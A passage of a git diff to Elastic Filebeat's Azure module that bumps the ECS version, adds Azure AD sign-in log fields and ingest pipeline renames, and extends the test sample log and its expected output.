ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml index a5460ed456e..83d9ff52c55 100644 --- a/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/auditlogs/config/azure-eventhub.yml @@ -30,4 +30,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/azure/auditlogs/config/file.yml b/x-pack/filebeat/module/azure/auditlogs/config/file.yml index ded48a1474f..9089596a627 100644 --- a/x-pack/filebeat/module/azure/auditlogs/config/file.yml +++ b/x-pack/filebeat/module/azure/auditlogs/config/file.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/azure/fields.go b/x-pack/filebeat/module/azure/fields.go index f37b4bf9ee8..d73cf818b09 100644 --- a/x-pack/filebeat/module/azure/fields.go +++ b/x-pack/filebeat/module/azure/fields.go @@ -19,5 +19,5 @@ func init() { // AssetAzure returns asset data. // This is the base64 encoded gzipped contents of module/azure. func AssetAzure() string { - return "eJzsXM9v2zoSvuevGORYbLP3HBbwpukiwLYpkvQsMNJY4Qst6pGUA/evfyBl/bJIio4pOQ+vPrWR830fh5zhcIbKZ3jF3TWQX5XACwBFFcNruFzp/19eAAhkSCRewzMqcgGQoUwFLRXlxTX85wIAwHwXvvGsYhpiTZFl8to8+gwF2WAHrz9qV+I15IJX5f4nFswhTB9KVs/ttxOatc8b4FfcvXHR/7kVvv7U0vuQcPdlRJlyIZCRKIw3HZaNSmFBCnUySw1jIxAoeSVSHOH3J2QC/WGMcThbfcrBYHwDmqDtU/eH1uc6HEUsujFuw1gKvqUZihlINca/NYssycDaHbv96aL08Zi/H6K14aNSL1zQX7ULijrORCJd9bFhgN3Sp4puqdoxnstJvzkMmJ2MNamYSoynXMOaMIlh7vbV+BasudjHq0YPaEFXwV6IhaJqZ7WczW0m7HZnx7NJ6MtIGaEbmdCCKkoUZsnzLqnkyH380gLk6c+N4YKWC5534OByyQb/Yh9Kta+/IwSDzQkOZeR0i8UyWv7npep2ZLGMnEcPUSNmXTG2jJqvPqbWNukLbsgCprHzDL3u6pPTy/jzH5gqy+P6QTIltfe1ZEPKkhb5/ncuP12e4r3OIQ32hDmix2qCICRkyJSXSziGk6a/hVlHEVnJys3TSEGdLhWjjGUoxjVvR0i59fP4pq8vV3CGCZGS5sUGC5X4phQCjXnEKPTngTOEToJ3VR0Iz3Bttr/Dk8tSqjv+w4zdJXl5kUcvgbNYsjf/AZYsBS1SWhK2uNgfDfNxMrWScwkdcTfyeImiPnPEPejcN7jjnLJ3TtenBYtZTjvaVUy5x7sn1QuNqK5iE4/ZjtxmKURhzoX9iPIu2hsbYrcRaWeOT3qrcf3UpdBLS1E8zG/efRz74UKcOpBJFFuaYiLwzwqlI7hNuV+A2z3WPPBQ88DdGKeVpIiqZJLyzBYSYmgxBDAgGJ/6q4yqoCP/UWd3jTo6uE8UB3zn+vjr9+kFW1Tga1Av2EXCK4CbSggsFNv9C1ZmNFTW3ynYDmRVllzow/aWsAqvFo2rT32l7tja0W9RyHG+Gk2BDT6oHvMubmtFxldYPnWsoyIzfJy9JH6E1VPbeq8bfyre1naZJ679n+cu/MNaZpJRWTKys3lgJDWrpky5p7IX0A7Wi0AiPef5kwQ9GGwTjHW8YtPWcnZ+IqpydIQOpTCe53W5dL9jz7aE8rpS6qIZR1FH7h5BTZcoWzmcHaZI9J7p6PyIKFTU40P6Cyc6kMaXimzGFZGJLCCSHZzo7e5CRI7aeevWka/S6KrszFBBfDKq2pbnuJYYVsSbiJQQt4L2xRcsYWrRRxbjOMK30+4+tEcU8eRiaS1RJiTLBErbDEcWA7SElYes0VRJFElX3lhm7fyUKLqayvQS2vCMrilmSZfNWD0Xguqyga0CeIezH2GDb/sxuTO05hNaAS7wLTGHGfeimKM+9R3fwE97RICaSWMTrMJ0cpadw5D3LHMIbANIrxt99MYVkkcUay42+xsGmBOR0SI3Oeiemb+3J01KlzdG66OsnBShDrTPJNuCq7PF3VcedQk0xaeA2Ahjx1pe72QSAMM1YCmmzapvVZYh5f3DiV9a5njaJxIax+0QiOlPP90coQ6lZZ7Rm0LTDPjbudLSzbIAH6KlL92cTZklzQ35R1t+Y0TpPe+jXJlr9Bx1Ze53+y8y8+/2X7/BFY/ycYzXGjUtv8e/I+xEbWhvGK8ithrGcA3RbbGlgpt7ERGn0AHakuopfqIbfFSCFnnkteMAbk1LGIt53dyC11A9poThz4JGNK0dsiFsKp6jRPGUC952zHGjaFT68FyNDKh1HFPjOL65P9pxdWylRfR+tYb9TIuYHevf3d9/Xjt2T9+Dii7AhX3WlGrhLv/CKdQ8TfY6kp3WZT9DRzAVaEqIxN3cf38r8KYGNwhgbTcOGg/zN/dNDSCosf+BeuhhTZlY1pmokAxEzWUYI8TXxi7L2bgdRcI+9QKXUMoybJl6m4gxIkcJLvzuLR2qj6TaMJXEuVzFkGjrg5Wkc9siMxf3CUtImqKUifXYGktWRwc1nf2U3MvjBM2pVjf3zdX7PRGI5uqqe1FTmdBCoTDXQ2Za0ncSfBxtislfsUiolBWKGR3sSdNATeP3sIGg+e4MDQR5rw2VguuFZg5mdIOJ5W2zRtGaceu+HqDnR8tiNm6gBWwoY1SidjH3+hZUviYZKkLZPIZ6oPIVHAQDEQy3yBKS5wJznYXMKMdQgYfKIiyrhJ7COm2cXVvNZpLUuzHbQJ4OYDMtciPIjn/4lx4W2GTbPxkQtNNObCMn9NktddD6E9JKRyG4cL10AHEv6txqLrBytQ0zNK9lTASAcxlrr26JO2hfDNVU53ZfdtFxYCcVbubXdd8wgoexkfcs+NtUbzmKqv96iD74hUYlKmmtz8wg6klz+bOD5sWoiVcpo72O1D66+CsAAP//n/8+qg==" + return "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" } diff --git a/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml index 49cfcef3a84..e54291d4b80 100644 --- a/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/platformlogs/config/azure-eventhub.yml @@ -31,4 +31,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/azure/platformlogs/config/file.yml b/x-pack/filebeat/module/azure/platformlogs/config/file.yml index 4242dc4cd7b..a2e28f634ea 100644 --- a/x-pack/filebeat/module/azure/platformlogs/config/file.yml +++ b/x-pack/filebeat/module/azure/platformlogs/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/azure/signinlogs/_meta/fields.yml b/x-pack/filebeat/module/azure/signinlogs/_meta/fields.yml index 9cb2ebbe9ce..63b542f0271 100644 --- a/x-pack/filebeat/module/azure/signinlogs/_meta/fields.yml +++ b/x-pack/filebeat/module/azure/signinlogs/_meta/fields.yml @@ -163,4 +163,51 @@ type: keyword description: > Status - + - name: authentication_requirement_policies + type: keyword + description: > + Set of CA policies that apply to this sign-in, each as CA: policy name, and/or MFA: Per-user. + - name: applied_conditional_access_policies + type: nested + description: > + Details of the conditional access policies being applied for the sign-in. + - name: resource_tenant_id + type: keyword + description: > + The resource tenantId for B2B(business-to-business) scenarios. + - name: authentication_details + type: nested + description: > + A record of each step of authentication undertaken in the sign-in. + - name: authentication_processing_details + type: flattened + description: > + Provides the details associated with authentication processor. + - name: flagged_for_review + type: boolean + description: Event was flagged for review. + - name: network_location_details + type: keyword + description: > + Provides the details associated with authentication processor. + - name: risk_event_types + type: keyword + description: > + The list of risk event types associated with the sign-in. + - name: risk_event_types_v2 + type: keyword + description: > + The list of risk event types associated with the sign-in. + - name: authentication_requirement + type: keyword + description: > + Type of authentication required for the sign-in. If set to + multiFactorAuthentication, an MFA step was required. If set to + singleFactorAuthentication, no MFA was required + - name: resource_id + type: keyword + description: > + ID of the resource that the user signed into. + - name: user_type + type: keyword + description: User type. diff --git a/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml index 9a6a86e08fa..8efc43474dc 100644 --- a/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/signinlogs/config/azure-eventhub.yml @@ -30,4 +30,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/azure/signinlogs/config/file.yml b/x-pack/filebeat/module/azure/signinlogs/config/file.yml index ded48a1474f..9089596a627 100644 --- a/x-pack/filebeat/module/azure/signinlogs/config/file.yml +++ b/x-pack/filebeat/module/azure/signinlogs/config/file.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml b/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml index e20115d6b05..800e7f01e60 100644 --- a/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml +++ b/x-pack/filebeat/module/azure/signinlogs/ingest/pipeline.yml @@ -155,6 +155,10 @@ processors: field: azure.signinlogs.properties.userId target_field: azure.signinlogs.properties.user_id ignore_missing: true +- rename: + field: azure.signinlogs.properties.userType + target_field: azure.signinlogs.properties.user_type + ignore_missing: true - rename: field: azure.signinlogs.properties.appId target_field: azure.signinlogs.properties.app_id @@ -247,6 +251,30 @@ processors: field: azure.signinlogs.properties.servicePrincipalId target_field: azure.signinlogs.properties.service_principal_id ignore_missing: true +- rename: + field: azure.signinlogs.properties.resourceTenantId + target_field: azure.signinlogs.properties.resource_tenant_id + ignore_missing: true +- rename: + field: azure.signinlogs.properties.flaggedForReview + target_field: azure.signinlogs.properties.flagged_for_review + ignore_missing: true +- rename: + field: azure.signinlogs.properties.riskEventTypes + target_field: azure.signinlogs.properties.risk_event_types + ignore_missing: true +- rename: + field: azure.signinlogs.properties.riskEventTypes_v2 + target_field: azure.signinlogs.properties.risk_event_types_v2 + ignore_missing: true +- rename: + field: azure.signinlogs.properties.authenticationRequirement + target_field: azure.signinlogs.properties.authentication_requirement + ignore_missing: true +- rename: + field: azure.signinlogs.properties.userAgent + target_field: user_agent.original + ignore_missing: true - remove: field: - azure.signinlogs.properties.location @@ -307,6 +335,9 @@ processors: field: source.as.organization_name target_field: source.as.organization.name ignore_missing: true +- user_agent: + field: user_agent.original + ignore_missing: true - pipeline: name: '{< IngestPipeline "azure-shared-pipeline" >}' on_failure: diff --git a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log index 1160b01bc21..76dbbd93208 100644 --- a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log +++ b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log @@ -1,2 +1,3 @@ {"Level":4,"callerIpAddress":"81.171.241.231","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.171.241.231","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} {"Level":4,"callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.171.241.231","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} +{"Level":4,"callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","durationMs":0,"identity":"Doe, John","location":"US","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office365 Shell WCSS-Client","appId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","appliedConditionalAccessPolicies":[{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"On-Prem Access Only","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"123ebbf1-e868-4a77-bfd9-b59bd6c2412e","result":"notApplied"},{"conditionsNotSatisfied":0,"conditionsSatisfied":0,"displayName":"ForceMFAfor B2C","enforcedGrantControls":[],"enforcedSessionControls":[],"id":"0dff3d49-001e-413f-86eb-2800e789674c","result":"notEnabled"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline policy: Require MFA for admins","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"a5527e71-9da1-41d0-859b-7ca84dae03a7","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Baseline Policy: Blocks legacy authentication","enforcedGrantControls":["Block"],"enforcedSessionControls":[],"id":"c1311105-97ac-4ebd-a866-5b215d066765","result":"notApplied"},{"conditionsNotSatisfied":1,"conditionsSatisfied":0,"displayName":"Netscaler MFA","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"ee756a5f-8c3b-41eb-8ace-0839597f718a","result":"notApplied"},{"conditionsNotSatisfied":8,"conditionsSatisfied":19,"displayName":"Enforce Verification on External Access","enforcedGrantControls":["Mfa"],"enforcedSessionControls":["SignInFrequency"],"id":"913f5adc-cd20-4b35-93b8-fbe145f68444","result":"notApplied"},{"conditionsNotSatisfied":2,"conditionsSatisfied":1,"displayName":"Test Policy","enforcedGrantControls":["Mfa"],"enforcedSessionControls":[],"id":"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa","result":"notApplied"}],"authenticationDetails":[{"RequestSequence":0,"StatusSequence":0,"authenticationMethod":"Previously satisfied","authenticationStepDateTime":"2021-01-26T13:39:55.7863053+00:00","authenticationStepRequirement":"Primary authentication","authenticationStepResultDetail":"First factor requirement satisfied by claim in the token","succeeded":true}],"authenticationProcessingDetails":[{"key":"Domain Hint Present","value":"True"},{"key":"Login Hint Present","value":"True"},{"key":"Private Link Id","value":"0"},{"key":"Azure AD App Authentication Library","value":"Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS"},{"key":"IsCAEToken","value":"False"}],"authenticationRequirement":"singleFactorAuthentication","authenticationRequirementPolicies":[],"clientAppUsed":"Browser","conditionalAccessStatus":"success","correlationId":"1ba108d9-9609-48be-baee-afc0885baa06","createdDateTime":"2021-01-26T13:39:55.7863053+00:00","deviceDetail":{"browser":"Chrome 87.0.4280","deviceId":"","operatingSystem":"Windows 10"},"flaggedForReview":false,"id":"a9222177-db03-40ef-9b86-5b207ed72000","ipAddress":"192.168.108.29","isInteractive":true,"location":{"city":"Pierre","countryOrRegion":"US","geoCoordinates":{"latitude":44.567081451416016,"longitude":-100.26722717285156},"state":"South Dakota"},"networkLocationDetails":[],"originalRequestId":"a9222177-db03-40ef-9b86-5b207ed72000","processingTimeInMilliseconds":162,"resourceDisplayName":"Microsoft Graph","resourceId":"00000003-0000-0000-c000-000000000000","resourceTenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","riskDetail":"none","riskEventTypes":[],"riskEventTypes_v2":[],"riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":0},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36","userDisplayName":"Doe, John","userId":"762a6171-29d0-456b-b88b-ca7f7d99728d","userPrincipalName":"john.doe@example.com","userType":"Member"},"resourceId":"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","time":"2021-01-26T13:39:55.7863053Z"} diff --git a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json index 75e6eb05bb2..195e52807f3 100644 --- a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json +++ b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json @@ -166,5 +166,218 @@ "user.full_name": "Test LTest", "user.id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", "user.name": "c3813493-bf92-5123-2717-8a8b2979c38b" + }, + { + "@timestamp": "2021-01-26T13:39:55.786Z", + "azure.correlation_id": "1ba108d9-9609-48be-baee-afc0885baa06", + "azure.resource.id": "/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam", + "azure.resource.provider": "Microsoft.aadiam", + "azure.signinlogs.category": "SignInLogs", + "azure.signinlogs.identity": "Doe, John", + "azure.signinlogs.operation_name": "Sign-in activity", + "azure.signinlogs.operation_version": "1.0", + "azure.signinlogs.properties.app_display_name": "Office365 Shell WCSS-Client", + "azure.signinlogs.properties.app_id": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", + "azure.signinlogs.properties.applied_conditional_access_policies": [ + { + "conditionsNotSatisfied": 2, + "conditionsSatisfied": 1, + "displayName": "On-Prem Access Only", + "enforcedGrantControls": [ + "Block" + ], + "enforcedSessionControls": [], + "id": "123ebbf1-e868-4a77-bfd9-b59bd6c2412e", + "result": "notApplied" + }, + { + "conditionsNotSatisfied": 0, + "conditionsSatisfied": 0, + "displayName": "ForceMFAfor B2C", + "enforcedGrantControls": [], + "enforcedSessionControls": [], + "id": "0dff3d49-001e-413f-86eb-2800e789674c", + "result": "notEnabled" + }, + { + "conditionsNotSatisfied": 2, + "conditionsSatisfied": 1, + "displayName": "Baseline policy: Require MFA for admins", + "enforcedGrantControls": [ + "Mfa" + ], + "enforcedSessionControls": [], + "id": "a5527e71-9da1-41d0-859b-7ca84dae03a7", + "result": "notApplied" + }, + { + "conditionsNotSatisfied": 2, + "conditionsSatisfied": 1, + "displayName": "Baseline Policy: Blocks legacy authentication", + "enforcedGrantControls": [ + "Block" + ], + "enforcedSessionControls": [], + "id": "c1311105-97ac-4ebd-a866-5b215d066765", + "result": "notApplied" + }, + { + "conditionsNotSatisfied": 1, + "conditionsSatisfied": 0, + "displayName": "Netscaler MFA", + "enforcedGrantControls": [ + "Mfa" + ], + "enforcedSessionControls": [ + "SignInFrequency" + ], + "id": "ee756a5f-8c3b-41eb-8ace-0839597f718a", + "result": "notApplied" + }, + { + "conditionsNotSatisfied": 8, + "conditionsSatisfied": 19, + "displayName": "Enforce Verification on External Access", + "enforcedGrantControls": [ + "Mfa" + ], + "enforcedSessionControls": [ + "SignInFrequency" + ], + "id": "913f5adc-cd20-4b35-93b8-fbe145f68444", + "result": "notApplied" + }, + { + "conditionsNotSatisfied": 2, + "conditionsSatisfied": 1, + "displayName": "Test Policy", + "enforcedGrantControls": [ + "Mfa" + ], + "enforcedSessionControls": [], + "id": "cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa", + "result": "notApplied" + } + ], + "azure.signinlogs.properties.authentication_details": [ + { + "RequestSequence": 0, + "StatusSequence": 0, + "authenticationMethod": "Previously satisfied", + "authenticationStepDateTime": "2021-01-26T13:39:55.7863053+00:00", + "authenticationStepRequirement": "Primary authentication", + "authenticationStepResultDetail": "First factor requirement satisfied by claim in the token", + "succeeded": true + } + ], + "azure.signinlogs.properties.authentication_processing_details": [ + { + "key": "Domain Hint Present", + "value": "True" + }, + { + "key": "Login Hint Present", + "value": "True" + }, + { + "key": "Private Link Id", + "value": "0" + }, + { + "key": "Azure AD App Authentication Library", + "value": "Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS" + }, + { + "key": "IsCAEToken", + "value": "False" + } + ], + "azure.signinlogs.properties.authentication_requirement": "singleFactorAuthentication", + "azure.signinlogs.properties.authentication_requirement_policies": [], + "azure.signinlogs.properties.client_app_used": "Browser", + "azure.signinlogs.properties.conditional_access_status": "success", + "azure.signinlogs.properties.correlation_id": "1ba108d9-9609-48be-baee-afc0885baa06", + "azure.signinlogs.properties.created_at": "2021-01-26T13:39:55.7863053+00:00", + "azure.signinlogs.properties.device_detail.browser": "Chrome 87.0.4280", + "azure.signinlogs.properties.device_detail.device_id": "", + "azure.signinlogs.properties.device_detail.operating_system": "Windows 10", + "azure.signinlogs.properties.flagged_for_review": false, + "azure.signinlogs.properties.id": "a9222177-db03-40ef-9b86-5b207ed72000", + "azure.signinlogs.properties.ip_address": "192.168.108.29", + "azure.signinlogs.properties.is_interactive": true, + "azure.signinlogs.properties.network_location_details": [], + "azure.signinlogs.properties.original_request_id": "a9222177-db03-40ef-9b86-5b207ed72000", + "azure.signinlogs.properties.processing_time_ms": 162, + "azure.signinlogs.properties.resource_display_name": "Microsoft Graph", + "azure.signinlogs.properties.resource_id": "00000003-0000-0000-c000-000000000000", + "azure.signinlogs.properties.resource_tenant_id": "19aa547c-22ab-606d-a4b6-541c5ce52b71", + "azure.signinlogs.properties.risk_detail": "none", + "azure.signinlogs.properties.risk_event_types": [], + 